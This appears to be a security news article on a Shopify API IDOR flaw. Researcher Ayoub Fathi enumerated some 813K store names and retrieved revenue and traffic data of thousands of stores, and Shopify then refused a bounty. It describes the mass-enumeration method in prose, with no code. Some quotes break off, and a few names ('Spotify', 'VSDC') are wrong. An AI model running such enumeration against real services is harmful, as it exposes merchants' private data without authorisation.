Bug bounty hunter Ayoub Fathi. discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.
The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.
The white hat hacker analyzed the APIs published over the past year by Shopify that allow users to fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had been removed from the platform.
The researcher carried out a mass check on all the existing stores to determine if the platform was affected by a Direct Object Reference (IDOR) issue iterating over $storeName.
Fathi then decided to perform a mass check on all existing stores instead to see if any customer information would leak through the API.
“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any.” reads a post published by the researcher.
“The attack process will be as follows:
Fathi found that 4 out of 1000 stores (one of which was closed) were vulnerable. The researcher decided to make further test using a larger dataset, containing 813,684 records, using Forward DNS.
“Using this approach, we don’t need to
The hacker created and exploit.py script to use the new word list composed of 813K store names
Using this approach the expert retrieved a list of vulnerable stores and queried them to get monthly revenue data in USD of the current store during its lifetime.
“This was tested on 800K merchant stores, +12,100 of them were exposed, +8700 were vulnerable stores that we were able to obtain their sales and traffic data and they should not be public, and 3400 are expected to have their sales data public” wrote Fathi “to summarize:
The researcher discovered that the leak was caused by the Shopify Exchange App.
Fathi reported the flaw to Spotify on 13 October 2018, the company acknowledged it on October 16 and closed the flaw on November 1.
The bad news is that Shopify has not awarded the expert citing policy violations because the expert tested shops not created for testing purposes.
Below an excerpt of the email Shopify sent to the expert:
“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”
(SecurityAffairs – hacking, VSDC)